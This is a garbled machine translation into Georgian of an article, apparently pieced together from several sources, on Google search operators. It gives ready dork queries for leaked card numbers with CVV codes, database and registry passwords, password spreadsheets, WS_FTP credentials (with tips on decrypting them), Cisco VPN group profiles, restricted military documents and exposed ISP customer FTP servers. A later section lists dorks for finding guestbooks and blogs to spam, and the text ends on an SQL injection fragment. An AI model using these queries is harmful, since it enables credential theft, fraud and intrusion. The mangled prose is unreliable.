პირადი მონაცემების წაშლა ყოველთვის არ ნიშნავს ბოროტებას - ზოგჯერ ის ქვეყნდება ფარული წვდომა. Google-ის ცოდნა და ცოტა ინტელექტი საშუალებას გაძლევთ გაიგოთ ბევრი რამ - საკრედიტო ბარათის ნომრებიდან დაწყებული FBI-ის დოკუმენტებით.

გაფრთხილება

ყველა ინფორმაცია მოცემულია მხოლოდ საგანმანათლებლო მიზნებისთვის. არც რედაქტორებს და არც ავტორს არ ეკისრებათ პასუხისმგებლობა ამ სტატიის მასალებიდან გამოწვეულ შესაძლო ზიანს.

დღეს ყველა უერთდება ინტერნეტს და ნაკლებად ზრუნავს წვდომის გაზიარებაზე. აქედან გამომდინარე, ბევრი პირადი მონაცემები ხელმისაწვდომი ხდება ხმის სისტემებისთვის. რობოტული „ობობები“ აღარ ურთიერთობენ ვებგვერდებთან, მაგრამ აინდექსირებენ მერეჟაში არსებულ ყველა შინაარსს და მუდმივად ამატებენ ინფორმაციას, რომელიც არ არის გამოყოფილი მათი მონაცემთა ბაზებში. ამ საიდუმლოებების გაგება მარტივია – თქვენ უბრალოდ უნდა იცოდეთ როგორ იკითხოთ მათ შესახებ.

ვეძებ ფაილებს

Google-ის უნარიან ხელში თქვენ სწრაფად იპოვით ყველაფერს, რისი მოტყუებაც ღირს მერეჟში - მაგალითად, სპეციალურ ინფორმაციას და ფაილებს სერვისის ვიკისთვის. მათ ხშირად ეძებენ, როგორც გასაღები კარის ხალიჩის ქვეშ: არ არსებობს მოქმედი წვდომის წერტილები, ისინი უბრალოდ დევს საიტის უკანა მხარეს, სადაც არ არის შეტყობინება. სტანდარტული Google ვებ ინტერფეისი უფრო მეტს იძლევა ძირითადი პარამეტრებიგაფართოებული ძებნა, მაგრამ ისინი საკმარისი იქნება.

თქვენ შეგიძლიათ მოძებნოთ ფაილები Google-ში ორი დამატებითი ოპერატორის გამოყენებით: ფაილის ტიპი და ext. პირველი განსაზღვრავს ფორმატს, რომელი ხმის ძრავა განისაზღვრება ფაილის სათაურით, მეორე - ფაილის გაფართოება, მიუხედავად შიდასა. ორივე შემთხვევაში ძიებისას საჭიროა უფრო ფართოდ მითითება. თავდაპირველად, ext ოპერატორი შეზღუდული იქნება გარკვეულ სიტუაციებში, თუ ფაილის ფორმატის სპეციფიკური მახასიათებლები არსებობდა (მაგალითად, კონფიგურაციის ფაილების ძიებაში ini და cfg, რომლებიც შეიძლება ყველა ერთი და იგივე იყოს). ამავდროულად, Google-ის ალგორითმები შეიცვალა და ოპერატორებს შორის აშკარა განსხვავება არ არის - შედეგები, უმეტეს შემთხვევაში, იგივე გამოდის.

ჩვენ ვფილტრავთ ხედს

შეყვანილი სიტყვებისა და სიმბოლოებისთვის Google ეძებს ყველა ფაილს ინდექსირებულ საიტებზე. შეგიძლიათ საძიებო ზონის დელიმიტირება ზედა დონის დომენით, კონკრეტული საიტით ან თავად ფაილებში საძიებო თანმიმდევრობის განთავსებით. პირველი ორი ვარიანტისთვის გამოიყენება საიტის ოპერატორი, რის შემდეგაც შეიტანება დომენის ან საიტის სახელი. მესამე ტიპში, ოპერატორების მთელი ნაკრები საშუალებას გაძლევთ მოძებნოთ ინფორმაცია მომსახურების ველებში და მეტამონაცემებში. მაგალითად, allinurl აჩვენებს ამოცანებს თავად შეტყობინებების სხეულში, allinanchor - ტეგით დაცულ ტექსტში. , Allintitle - გვერდების სათაურებში, allintext - გვერდების სხეულში.

კანის ოპერატორისთვის არის მსუბუქი ვერსია უფრო მოკლე სახელით (ყველა პრეფიქსის გარეშე). განსხვავება ისაა, რომ allinurl წარმოადგენს გზავნილს ყველა სიტყვით, ხოლო inurl ნიშნავს მხოლოდ პირველ მათგანს. სხვა და ახალი სიტყვები საძიებო ნიმუშებიდან ნებისმიერ დროს შეგიძლიათ ნახოთ ვებსაიტებზე. inurl ოპერატორს ასევე აქვს იგივე მნიშვნელობა, რაც სხვა მსგავს ადგილს - საიტს. პირველი ასევე საშუალებას გაძლევთ გაარკვიოთ სიმბოლოების თანმიმდევრობა საძიებლად გაგზავნილ დოკუმენტში (მაგალითად, /cgi-bin/), რომელიც ფართოდ გამოიყენება ცნობილი პრობლემების მქონე კომპონენტების საძიებლად.

პრაქტიკაში ვცადოთ. ჩვენ ვიღებთ allintext ფილტრს და ვმუშაობთ ისე, რომ მოვითხოვოთ საკრედიტო ბარათების ნომრებისა და დამადასტურებელი კოდების სია, რომელიც დასრულდება მხოლოდ ორ დღეში (ან თუ მათ მმართველებს მოუწევთ ყველას ზედიზედ ლოდინი).

Allintext: ბარათის ნომრის ვადის გასვლის თარიღი / 2017 cvv

თუ ახალ ამბებში წაიკითხავთ, რომ ახალგაზრდა ჰაკერმა "გატეხა სერვერები" პენტაგონის ან NASA-ს, მოიპარა საიდუმლო ჩანაწერები, მაშინ უმეტეს შემთხვევაში Google-ისგან გაიგებთ ასეთი ელემენტარული ტექნიკის შესახებ. დასაშვებია ნასას ჯაშუშების სიის და მათი საკონტაქტო ინფორმაციის ჩამოტვირთვა. ასეთი მელოდიური ხარისხია ელექტრონულ გარეგნობაში. სიცხადისთვის, ან ზედამხედველობის საშუალებით, ისინი შეიძლება განთავსდეს თავად ორგანიზაციის ვებსაიტზე. ლოგიკურია, რომ ამ შემთხვევაში შიდა ვიკორისტანისთვის ღვინოების მნიშვნელობის ფრაგმენტების გაგზავნა არ მოხდება. რა სიტყვები შეიძლება იყოს ასეთ ფაილში? მინიმუმ - "მისამართის" ველი. ყველა ამ ვარაუდის გადამოწმება ისეთივე მარტივია, როგორც მსხლის ჭურვი.

Inurl: nasa.gov ფაილის ტიპი: xlsx "მისამართი"

ეგოისტური ბიუროკრატია

მსგავსი აღმოჩენები მიღებულია. ფაქტობრივად, მყარი დაჭერა უზრუნველყოფილი იქნება Google-ის ოპერატორების უფრო დეტალური ცოდნით ვებ მასტერებისთვის, თავად Measure და თევზის სტრუქტურის თავისებურებებით. დეტალების ცოდნით, თქვენ შეგიძლიათ მარტივად გაფილტროთ ხედი და გაარკვიოთ საჭირო ფაილების სიმძლავრე, რათა ეფექტურად ამოიღოთ ღირებული მონაცემები. სასაცილოა, რომ აქ ბიუროკრატია შველის. აქ შეგიძლიათ შექმნათ ტიპიური ფორმულები, რომელთა უკან საიდუმლო ჩანაწერები მოულოდნელად გაჟონა მერეჟაში.

მაგალითად, აშშ-ს თავდაცვის დეპარტამენტის ოფისში Distribution-ის განცხადების ბეჭედი ნიშნავს დოკუმენტის გაფართოების სტანდარტიზაციას. ასო A აღნიშნავს საჯარო რელიზებს, რომლებშიც არაფერია საიდუმლო; B - აღიარებულია მხოლოდ შიდა გამოყენებისთვის, C - მკაცრად კონფიდენციალური და ასე შემდეგ F-მდე. მკაცრად ღირს ასო X, რაც განსაკუთრებით ღირებული ინფორმაციაა, რაც მას სახელმწიფო ციხედ აქცევს დიდ მნიშვნელობას. დაე, ასეთი დოკუმენტები მოიძიონ მათ, ვინც უნდა იმუშაოს ოფიციალურ აღჭურვილობაზე და ჩვენ გავცვალოთ ფაილები ასო C-ით. DoDI დირექტივის 5230.24 შესაბამისად, ასეთი ეტიკეტირება ენიჭება დოკუმენტებს, რომლებიც შეიცავს კრიტიკულად მნიშვნელოვანი ტექნოლოგიების აღწერას, რომლებიც გამოყენებული იქნება. ბანაობა ექსპორტის კონტროლის ქვეშ. თქვენ შეგიძლიათ იპოვოთ საგულდაგულოდ დაცული ინფორმაციის შინაარსი საიტებზე ზედა დონის domain.mil-ში, რომელიც განკუთვნილია აშშ-ს არმიისთვის.

"DISTRIBUTION STATEMENT C" inurl: navy.mil

ძალიან ნათელია, რომ .mil დომენში გროვდება მხოლოდ საიტები აშშ-ს თავდაცვის დეპარტამენტისა და მისი საკონტრაქტო ორგანიზაციებიდან. პოშუკოვის შეხედულება დომენის საზღვრებზე სრულიად სუფთაა და სათაურები თავისთავად საუბრობენ. პრაქტიკული იქნება რუსული საიდუმლოების გაცნობა ანალოგიურად: domains.ru i.rf-ში ქაოსია და მდიდარი სისტემების სახელები ახლა ჟღერს როგორც ბოტანიკურს (PP „Kiparis“, SAU „Akatsia“) ან მთლიანად კაზკოვს (TOS). "ბურატინო").

საიტიდან ნებისმიერი დოკუმენტის ყურადღებით ნახვის შემდეგ .mil დომენში, შეგიძლიათ დაამატოთ სხვა მარკერები თქვენი ძიების გასარკვევად. მაგალითად, ექსპორტის რეგულაციების გაფართოება "Sec 2751", რაც ასევე აადვილებს ტექნიკური ინფორმაციის მოძიებას. საათობრივად ისინი იღებენ ოფიციალური საიტებიდან, თუნდაც მხოლოდ ერთხელ ანათებენ, რადგან ძიების რეჟიმში ვერ მიდიხართ საჭირო ადგილას, გამოიყენეთ Google-ის ქეში (ქეშის ოპერატორი) ან ინტერნეტ არქივის საიტი, რომ დააჩქაროთ საქმე.

სიბნელისთვის ემზადება

KRIM Vipadkovo ROZSKORECHENKH DOMIDIV URIDIH VIMENITH, Keshihlah-ში, ქსოვს ცხელება ცალკეულ ფაილებზე Z Dropbox I, INSHISIV DANYANNYA DANYA, yaki, “Privatni”, Posilanni on Publinno Plane -Ompudykovani Danі. ეს კიდევ უფრო უარესია ალტერნატიული და თვითკმარი სერვისებით. მაგალითად, ახლა მოგეთხოვებათ გაიგოთ Verizon-ის ყველა კლიენტის მონაცემები, რომლებსაც აქვთ დაინსტალირებული FTP სერვერი როუტერზე და აქტიურად იყენებენ მას.

Allinurl:ftp://verizon.net

ასეთი ბრძენი ერთ დროს ორმოც ათასზე მეტი იყო და 2015 წლის გაზაფხულზე კიდევ ბევრი იყო. Verizon.net-ის ნაცვლად, შეგიძლიათ შეცვალოთ ნებისმიერი ხილული პროვაიდერის სახელი და რაც უფრო ხილული იქნება, მით უფრო დიდია დაჭერა. FTP სერვერის გამოყენებით შეგიძლიათ იხილოთ ფაილები როუტერთან დაკავშირებულ გარე შენახვის მოწყობილობაზე. აირჩიეთ NAS დისტანციური მუშაობისთვის, პერსონალური მეხსიერებისთვის ან Peer-to-peer ფაილის ჩამოტვირთვისთვის. ყველა ასეთი ფაილი ინდექსირებულია Google-ისა და სხვა საძიებო სისტემების მიერ, ამიტომ გარე დისკებზე შენახულ ფაილებზე წვდომა შეიძლება უარყოფილი იყოს პირდაპირი მოთხოვნით.

უყურებს კონფიგურაციას

პირქუშ რეგიონებში საერთო მიგრაციამდე, მარტივი FTP სერვერები იყო პასუხისმგებელი, რამაც ასევე გამოიწვია კონფლიქტები. მათ შესახებ ბევრი სიახლეა. მაგალითად, პოპულარულ პროგრამაში WS_FTP Professional, ღრუბლოვანი ანგარიშების და პაროლების შესანახი კონფიგურაციის მონაცემები ინახება ws_ftp.ini ფაილში. მისი ცოდნა და წაკითხვა მარტივია და ყველა ჩანაწერი ინახება ტექსტის ფორმატში, ხოლო პაროლები დაშიფრულია Triple DES ალგორითმით მინიმალური დაბინდვის შემდეგ. უმეტეს ვერსიებში, თქვენ უბრალოდ უნდა ჩააგდოთ პირველი ბაიტი.

ასეთი პაროლების გაშიფვრა მარტივია დამატებითი უტილიტა WS_FTP Password Decryptor-ის ან უფასო ვებ სერვისის გამოყენებით.

საუბრისას საიტის ბოროტებაზე, თქვენ უნდა პატივი სცეთ პაროლების ამოღებას ჟურნალებიდან და CMS კონფიგურაციის ფაილების ან დამატებების სარეზერვო ასლებიდან ელექტრონული კომერციისთვის. თუ იცით მათი ტიპიური სტრუქტურა, შეგიძლიათ მარტივად შეხვიდეთ საკვანძო სიტყვები. ws_ftp.ini-ში ნაჩვენები სტრიქონები უფრო ფართოა კიდეებზე. მაგალითად, Drupal-სა და PrestaShop-ში სავალდებულოა მომხმარებლის იდენტიფიკატორი (UID) და პაროლი (pwd) და ყველა ინფორმაცია ინახება ფაილებში .inc გაფართოებით. მათზე ხუმრობა შეგიძლიათ შემდეგნაირად:

"Pwd=""UID="ext:inc

DBMS-ის პაროლების აღდგენა

SQL სერვერის კონფიგურაციის ფაილებს აქვთ სახელები და მისამართები ელექტრონული ფოსტითთქვენი პაროლები ინახება თვალსაჩინოდ და პაროლების ნაცვლად მათი MD5 ჰეშები ჩაიწერება. როგორც ჩანს, შეუძლებელია მათი გაშიფვრა, მაგრამ შეგიძლიათ გაიგოთ მოცემული ჰეშ-პაროლის წყვილის ვინაობა.

ჯერ კიდევ არსებობს უამრავი DBMS, რომელიც არ ეყრდნობა პაროლის ჰეშინგს. თქვენ შეგიძლიათ უბრალოდ აღფრთოვანებულიყავით ფაილებით, როგორიც არ უნდა იყოს ისინი, თქვენს ბრაუზერში.

Intext: DB_PASSWORD ფაილის ტიპი: env

გამოჩნდება სერვერებზე ფანჯრის ადგილიკონფიგურაციის ფაილები ხშირად იკავებენ რეესტრს. თქვენ შეგიძლიათ მოძებნოთ თქვენი ფაილები ზუსტად იგივე გზით, როგორც ფაილის ტიპი. მაგალითად, ღერძი ასეთია:

ფაილის ტიპი: reg HKEY_CURRENT_USER "პაროლი" =

არ დავივიწყოთ აშკარა

როდესაც დახურულ ინფორმაციაზე წვდომა არის უზრუნველყოფილი, ის მოკლედ იხსნება და იკარგება ხედვის არეში Google მონაცემები. იდეალური ვარიანტია პაროლების სიის პოვნა გაფართოებულ ფორმატში. შეინახეთ ანგარიშის ინფორმაცია ტექსტურ ფაილში, Word დოკუმენტებიან ელექტრონული Excel ცხრილებიმხოლოდ ყველაზე შესანიშნავ ადამიანებს შეუძლიათ, მაგრამ ისინი არასოდეს მარცხდებიან.

ფაილის ტიპი: xls inurl: პაროლი

ერთის მხრივ, ასეთი ინციდენტების თავიდან აცილების ხარჯები საკმაოდ დიდია. აუცილებელია htaccess-ზე ადექვატური წვდომის უფლებების უზრუნველყოფა, CMS-ის შესწორება, მარცხენა სკრიპტების ბოროტად გამოყენება და სხვა ფაილების დახურვა. ასევე არის ფაილი robots.txt ხარვეზების სიით, რომელიც ხელს უშლის საძიებო სისტემებს მათში დამატებული ფაილებისა და დირექტორიების ინდექსირებაში. მეორეს მხრივ, ვინაიდან robots.txt-ის სტრუქტურა ნებისმიერ სერვერზე განსხვავდება სტანდარტულისგან, მაშინვე ცხადი ხდება, რომ ისინი ცდილობენ ჩაერთონ.

დირექტორიებისა და ფაილების სია ნებისმიერ ვებსაიტზე მითითებულია სტანდარტული ინდექსით. სერვისის მიზნებისთვის ფრაგმენტები უნდა იყოს შეკუმშული სათაურში, შემდეგ შესაძლებელია ამ ძიებების მიმაგრება სათაურის ოპერატორთან. თქვენი გამოსვლები შეგიძლიათ იხილოთ /admin/, /personal/, /etc/ და /secret/ დირექტორიებში.

თვალყური ადევნეთ განახლებებს

აქ რელევანტურობა ძალზე მნიშვნელოვანია: ძველი პრობლემები მთლიანად იხურება, მაგრამ Google და მისი საძიებო სისტემა სტაბილურად იცვლება. არის განსხვავება ფილტრს „დარჩენილ წამში“ (& tbs = qdr: s საძიებო URL-ის ბოლოს) და „რეალურ საათში“ (& tbs = qdr: 1) შორის.

თარიღის საათის ინტერვალი იყავი განახლებული Google ფაილი ასევე შეიძლება იყოს მინიშნებული. გრაფიკული ვებ ინტერფეისის საშუალებით შეგიძლიათ აირჩიოთ ერთ-ერთი სტანდარტული პერიოდი (წელი, დღე, კვირა და ა.შ.) ან დააყენოთ თარიღის დიაპაზონი, წინააღმდეგ შემთხვევაში ეს მეთოდი არ არის შესაფერისი ავტომატიზაციისთვის.

მისამართის მწკრივის გარეგნობით, შეგიძლიათ გამოიცნოთ შედეგების ჩვენების გამოყოფის გზა დამატებითი კონსტრუქციიდან & tbs = qdr:. ასო y მის შემდეგ განსაზღვრავს ერთი მდინარის ზღვარს (& tbs = qdr: y), m აჩვენებს შედეგებს ბოლო თვისთვის, w - წლისთვის, d - ბოლო დღისთვის, h - ბოლო წლისთვის, n - თვისთვის და ს - წამში. უახლესი შედეგები, მხოლოდ ის, რაც გახდა Google-ისთვის ხილული, გამოიყენეთ დამატებითი ფილტრი & tbs = qdr: 1.

თუ ჭკვიანური სკრიპტის დაწერა გჭირდებათ, სასარგებლო იქნება იმის ცოდნა, რომ თარიღის დიაპაზონი მითითებულია Google-ში ჯულიანის ფორმატში daterange ოპერატორის გამოყენებით. მაგალითად, ღერძი შეგიძლიათ ნახოთ სიაში PDF დოკუმენტებისიტყვით კონფიდენციალური, მოწვეული 2015 წლის 1 სექტემბრიდან 1 ივნისამდე.

კონფიდენციალური ფაილის ტიპი: pdf თარიღის დიაპაზონი: 2457024-2457205

დიაპაზონი მითითებულია იულიუსის თარიღების ფორმატში წილადი ნაწილის გარეშე. მათი ხელით თარგმნა გრიგორიანული კალენდრიდან ადვილი არ არის. თარიღის გადამყვანის გამოყენება უფრო ადვილია.

დამიზნება და ისევ გაფილტვრა

ხმის თანმიმდევრობით დამატებითი ოპერატორების ჩასმის გარდა, ისინი შეიძლება დაემატოს შეტყობინების ძირითად ნაწილს. მაგალითად, ფაილის ტიპის დაზუსტება: pdf მხარს უჭერს კონსტრუქციას as_filetype = pdf. ამ გზით, ადვილია ხელით მოითხოვოთ რაიმე განმარტება. ვთქვათ, რომ შედეგების ნახვისას მხოლოდ ჰონდურასის რესპუბლიკიდან, საძიებო URL-ს ემატება კონსტრუქცია cr = countryHN, ხოლო ქალაქ ბობრუისკიდან - gcs = Bobruisk. სრული სია შეგიძლიათ ნახოთ საცალო ვაჭრობის განყოფილებაში.

Google-ის დაწკაპუნების ავტომატიზაციის ფუნქციები ცხოვრებას აადვილებს, მაგრამ ხშირად იწვევს პრობლემებს. მაგალითად, კლიენტის IP-ის მიხედვით, მისი მდებარეობა მითითებულია WHOIS-ის საშუალებით. ამ ინფორმაციის საფუძველზე Google არა მხოლოდ აბალანსებს ტრაფიკს სერვერებს შორის, არამედ ცვლის ძიების შედეგების შედეგებს. მნიშვნელოვანია რეგიონში, ერთი და იგივე მოთხოვნით, პირველ მხარეს განსხვავებული შედეგების დაყენება და ზოგიერთი მათგანი შესაძლოა დატყვევებულადაც კი გამოჩნდეს. ჩათვალეთ თავი კოსმოპოლიტად და მოიძიეთ ინფორმაცია ნებისმიერი ქვეყნიდან ორასოიანი კოდის გამოყენებით gl = ქვეყნის დირექტივის შემდეგ. მაგალითად, ნიდერლანდების კოდი არის NL, ხოლო ვატიკანსა და სამხრეთ კორეას არ აქვთ მათი კოდი Google-ში.

ხშირად საძიებო სისტემა აღმოჩენილ მომხმარებელს რამდენიმე ფილტრის ჩასმის შემდეგ ეჩვენება. ასეთ ვითარებაში მარტივია წინადადების გარკვევა სიტყვების ახალი რაოდენობის დამატებით (თითოეულის წინ არის მინუს ნიშანი). მაგალითად, სიტყვა Personal ხშირად გამოიყენება საბანკო საქმეში, სახელწოდებებში და სახელმძღვანელოში. ამიტომაც არის სუფთა ძიების შედეგებინება მომეცით გაჩვენოთ არა სახელმძღვანელოს კონდახი, არამედ განმარტებები:

სათაური: "ინდექსი / პირადი /" -სახელები -სამეურვეო -საბანკო

კონდახის მარაგი

ჰაკერი დარწმუნებულია, რომ თვითონ უზრუნველყოფს ყველაფერს, რაც მას სჭირდება. მაგალითად, VPN არის მარტივი რამ, ან ძვირი ან შრომატევადი და შეზღუდვებით. ძალიან ძვირია გამოწერაზე დარეგისტრირება მხოლოდ საკუთარი თავისთვის. კარგია, რომ არის ჯგუფური გამოწერები და Google-ის დახმარებით ადვილია გახდე ნებისმიერი ჯგუფის წევრი. ამისთვის საკმარისია ვიცოდეთ Cisco VPN კონფიგურაციის ფაილი, რომელსაც აქვს არასტანდარტული PCF გაფართოება და ამოცნობის გზა: Program Files\Cisco Systems\VPN Client\Profiles. ერთი დალიე და შეუერთდები, მაგალითად, ბონის უნივერსიტეტის მეგობრულ გუნდს.

ფაილის ტიპი: pcf vpn ან ჯგუფი

ინფორმაცია

Google-მა იცის კონფიგურაციის ფაილები პაროლებით და ბევრი მათგანი ჩაწერილია დაშიფრული ფორმით ან ჩანაცვლებულია ჰეშებით. თუ თქვენ გაქვთ ფიქსირებული შემოსავლის მრავალი რიგი, მაშინ დაუყოვნებლივ მოძებნეთ გაშიფვრის სერვისი.

პაროლები ინახება დაშიფრული ფორმით და მორის მასარტმა უკვე დაწერა პროგრამა მათი გაშიფვრის მიზნით და თავისუფლად აზიარებს მათ thecampusgeeks.com-ის საშუალებით.

ზე Google-ის დამატებითი დახმარებაასობით არის ხელმოწერილი განსხვავებული ტიპებიშეტევები და შეღწევადობის ტესტები. არსებობს უამრავი ვარიანტი პოპულარული პროგრამების, მონაცემთა ბაზის ძირითადი ფორმატების, PHP ნომრების, აპარატურის და ა.შ. თუ შეძლებთ ზუსტად განსაზღვროთ რას ეძებთ, მისი ამოღება ძალიან ადვილი იქნება მოთხოვნილი ინფორმაცია(განსაკუთრებით მათ, ვინც არ აპირებდა მიწისქვეშა აბანოებზე მუშაობას). ჩი ნო შოდანი გაერთიანდა საცხოვრებლად დიდი იდეები, ალე იყოს ინდექსირებული შუალედური რესურსების ბაზა!

როგორ სწორად მოძებნოთ დამატებითი დახმარება google.com

ყველა მელოდიურად იწოვს ამგვარს ხმის სისტემა, Yak Google =) ისე არ არის, რომ თქვენ ყველაფერი იცით, ასე რომ თქვენ შეგიძლიათ სწორად მოაწყოთ იგი ითხოვეთ ხმასპეციალური დიზაინის დახმარებით შეგიძლიათ მიაღწიოთ შედეგებს, რომლებსაც ეძებთ უფრო ეფექტურად და სწრაფად =) ამ სტატიაში შევეცდები გაჩვენოთ რა და როგორ უნდა იმუშაოთ იმისათვის, რომ სწორად ხუმროთ

Google ხელს უწყობს რამდენიმე გაფართოებულ საძიებო ოპერატორს, რომლებსაც განსაკუთრებული მნიშვნელობა აქვთ google.com-ზე ძიებისას. ტიპიურია, რომ ოპერატორები ცვლიან ძიებას, ან ეუბნებიან Google-ს, რომ სრულად იმუშაოს განსხვავებული ტიპებიუბრალოდ ვიკითხავ. მაგალითად, დიზაინი ბმული:სპეციალური ოპერატორის მიერ, ვთხოვ ბმული: www.google.comმე არ მოგცემთ ნორმალურ ძიებას, მაგრამ სამაგიეროდ თქვენ იპოვით ყველა ვებსაიტს, რომელსაც აქვს ბმულები google.com-ზე.
შეკითხვის ალტერნატიული ტიპები

ქეში:თუ თქვენს მოთხოვნაში სხვა სიტყვებს შეიტანთ, Google მონიშნავს დოკუმენტში შეტანილ სიტყვებს.
მაგალითად, ქეში: www.websiteაჩვენეთ ქეში სიტყვა "ვებ"-ის ნაცვლად.

ბმული:ყველაზე ხშირად მოძიებული საძიებო მოთხოვნა გაჩვენებთ ვებ გვერდებს, რომლებიც გაიგზავნება მითითებულ მოთხოვნაზე.
მაგალითად: ბმული: www.siteყველა გვერდის ჩვენება, რომლებზეც იგზავნება http://www.site

დაკავშირებული:აჩვენეთ ვებ გვერდები, რომლებიც "დაკავშირებულია" მითითებულ ვებ გვერდზე.
მაგალითად, დაკავშირებული: www.google.comახდენს Google-ის მთავარი გვერდის მსგავსი ვებგვერდების რეორგანიზაციას.

ინფორმაცია:მოთხოვნილი ინფორმაცია: მიაწოდეთ მცირე ინფორმაცია, რომელსაც Google პოულობს მოთხოვნილი ვებგვერდის შესახებ.
მაგალითად, ინფორმაცია: საიტიაჩვენეთ ინფორმაცია ჩვენი ფორუმის შესახებ =) (Armada - Adult Web Masters Forum).

სხვა საინფორმაციო ჩანაწერები

განსაზღვრე:დასვით განსაზღვრა: უზრუნველყავით სიტყვების მნიშვნელობა, როდესაც შეხვალთ ამის შემდეგ კოლექციებში საზღვრის სხვადასხვა ნაწილიდან. მნიშვნელობა გამოყენებული იქნება ყველა შეყვანილ ფრაზაზე (ეს ნიშნავს, რომ ყველა სიტყვა შედის ზუსტ ჩანაწერში).

აქციები:როდესაც დაიწყებთ აქციების ძიებას: Google-ში მოძებნეთ აქციების სიმბოლოების ტერმინების სია და დაუკავშირდით ამ გვერდს ამ სიმბოლოების შესახებ მზა ინფორმაციის მისაღებად.
მაგალითად, აქციები: Intel yahooაჩვენე ინფორმაცია Intel-ისა და Yahoo-ს შესახებ. (ეს ნიშნავს, რომ თქვენ ხართ პასუხისმგებელი დარჩენილი ახალი პროდუქტების სიმბოლოების მარკირებაზე, კომპანიის დასახელების გარეშე)

პოპიტივის მოდიფიკატორები

საიტი:თუ თქვენ ჩართავთ საიტს: Google შეზღუდავს შედეგებს იმ ვებსაიტებით, რომლებიც გვხვდება ამ დომენში.
თქვენ ასევე შეგიძლიათ მოძებნოთ სხვა სფეროებში, როგორიცაა ru, org, com და ა.შ. საიტი: com საიტი: ru)

allintitle:თუ თქვენ შეასრულებთ შეკითხვას allintitle:-ით, Google დაურთავს შედეგებს სათაურის ყველა სიტყვით.
მაგალითად, allintitle: გუგლის ძებნაგადაატრიალეთ Google-ის ყველა გვერდი, რომ მოძებნოთ რაღაცები, როგორიცაა სურათები, ბლოგი და ა.შ

სათაური:თუ თქვენ ჩართავთ სათაურს: თქვენს ძიებაში, Google შედეგებს აკრავს დოკუმენტებით, რომლებიც ამ სიტყვებს სათაურში ათავსებენ.
მაგალითად, სათაური: ბიზნესი

ალინურლი:როდესაც თქვენ აწარმოებთ შეკითხვას allinurl-ით: Google დაურთავს შედეგებს URL-ის ყველა სიტყვით.
მაგალითად, allinurl: გუგლის ძებნაგადააქციეთ დოკუმენტები Google-იდან და მოძებნეთ სათაური. ალტერნატიულად, შეგიძლიათ გამოყოთ სიტყვები დახრილობით (/) ისე, რომ დახრილის ორივე მხარეს სიტყვები იმავე გვერდებს შორის გამოჩნდეს: კონდახი allinurl:foo/bar

inurl:თუ თქვენ ჩართავთ inurl: თქვენს ძიებაში, Google შედეგებს გარს შემოუვლის დოკუმენტებით, რომლებიც შეიცავენ ამ სიტყვებს URL-ში.
მაგალითად, ანიმაცია inurl: ვებგვერდი

intext:ეძებს მხოლოდ გვერდის ტექსტში შეყვანილ სიტყვას, იგნორირებას უკეთებს შეტყობინების სახელსა და ტექსტს და აღარ გააგრძელებს. და ასევე მსგავსი მოდიფიკატორი - allintext:ისე, რომ ჩანაწერში ყველა სიტყვა ხუმრობს მხოლოდ ტექსტში, რაც ასევე მნიშვნელოვანია, კომენტარებში ხშირად ბოროტად გამოყენებული სიტყვების იგნორირება
მაგალითად, intext: ფორუმი

თარიღის დიაპაზონი:ძიება დრო-საათის ჩარჩოებში (თარიღის დიაპაზონი: 2452389-2452389), საათის თარიღები მითითებულია იულიანის ფორმატში.

ისე და ყველა სხვა რამ კონდახებიეკითხება

გამოიყენეთ დასაკეცი მოთხოვნები Google-ისთვის. სპამერებისთვის

Inurl: კონტროლი.სტუმარი? A = ნიშანი

საიტი: books.dreambook.com "მთავარი გვერდის URL" "Sign my" inurl: sign

საიტი: www.freegb.net საწყისი გვერდი

Inurl: sign.asp "პერსონაჟების რაოდენობა"

"Message:" inurl: sign.cfm "Sender:"

Inurl: register.php "მომხმარებლის რეგისტრაცია" "ვებგვერდი"

Inurl: edu/guestbook "Sign the Guestbook"

Inurl: გამოაქვეყნეთ "კომენტარის გამოქვეყნება" "URL"

Inurl: / არქივები / "კომენტარები:" "გახსოვთ ინფორმაცია?"

"სკრიპტი და სტუმრების წიგნი შექმნილია:" "URL:" "კომენტარები:"

ინურლი:? მოქმედება = დაამატეთ "phpBook" "URL"

სათაური: "გააგზავნე ახალი ამბავი"

ჟურნალები

Inurl: www.livejournal.com/users/ mode = პასუხი

Inurl greatestjournal.com/ რეჟიმი = პასუხი

Inurl: fastbb.ru/re.pl?

Inurl: fastbb.ru /re.pl? "სტუმრების წიგნი"

ბლოგები

Inurl: blogger.com/comment.g? "PostID" "ანონიმური"

Inurl: typepad.com/ "გამოაქვეყნეთ კომენტარი" "გახსოვთ პირადი ინფორმაცია?"

Inurl: greatestjournal.com/community/ "გამოაქვეყნე კომენტარი" "ანონიმური პლაკატების მისამართები"

"დააქვეყნეთ კომენტარი" "ანონიმური პლაკატების მისამართები" -

სათაური: "დააქვეყნე კომენტარი"

Inurl: pirillo.com "გამოაქვეყნე კომენტარი"

ფორუმი

Inurl: gate.html? "სახელი = ფორუმი" "რეჟიმი = პასუხი"

Inurl: "forum/posting.php? რეჟიმი = პასუხი"

Inurl: "mes.php?"

Inurl: "members.html"

Inurl: forum/memberlist.php? "

ცოტა მსმენია ინფორმაციის დაცვა. სტატია სასარგებლო იქნება დამწყები პროგრამისტებისთვის და მათთვის, ვინც ახლახან დაიწყო Frontend-ის განვითარებაში ჩართვა. Რა პრობლემაა?

ბევრი დამწყები დეველოპერი იმდენად დაკავებულია კოდის წერით, რომ მთლიანად ივიწყებს სამუშაოს უსაფრთხოებას. და რაც უფრო უარესია - მათ ავიწყდებათ ისეთი განსხვავებები, როგორიცაა SQL, XXS. თქვენ ასევე შეგიძლიათ შეადგინოთ მარტივი პაროლები თქვენი ადმინისტრაციული პანელებისთვის და წარუდგინოთ Bruteforce-ს. რა არის ეს თავდასხმები და როგორ შეგიძლიათ დაამარცხოთ ისინი?

SQL ინექცია

SQL ინექცია არის მონაცემთა ბაზაზე თავდასხმის ყველაზე ფართო ტიპი, რომელიც ხდება მაშინ, როდესაც SQL იწერება კონკრეტული DBMS-ისთვის. ხალხი და დიდი კომპანიები განიცდიან ასეთ შეტევებს. მიზეზი არის დეველოპერის წყალობა მონაცემთა ბაზის დაწერისას და, როგორც ჩანს, SQL მოთხოვნები.

SQL მავნე პროგრამის შეტევა შესაძლებელია შეყვანილი მონაცემების არასწორი დამუშავებით, რომლებიც გვხვდება SQL მოთხოვნებში. თუ თქვენ განაგრძობთ შეტევას ჰაკერის მხრიდან, თქვენ რისკავთ არა მხოლოდ თქვენი მონაცემთა ბაზების, არამედ თქვენი პაროლების და ადმინისტრაციული პანელის ჟურნალების დაკარგვას. და ეს მონაცემები სრულიად საკმარისი იქნება საიტის სრულად სამართავად ან მასში მუდმივი კორექტირებისთვის.

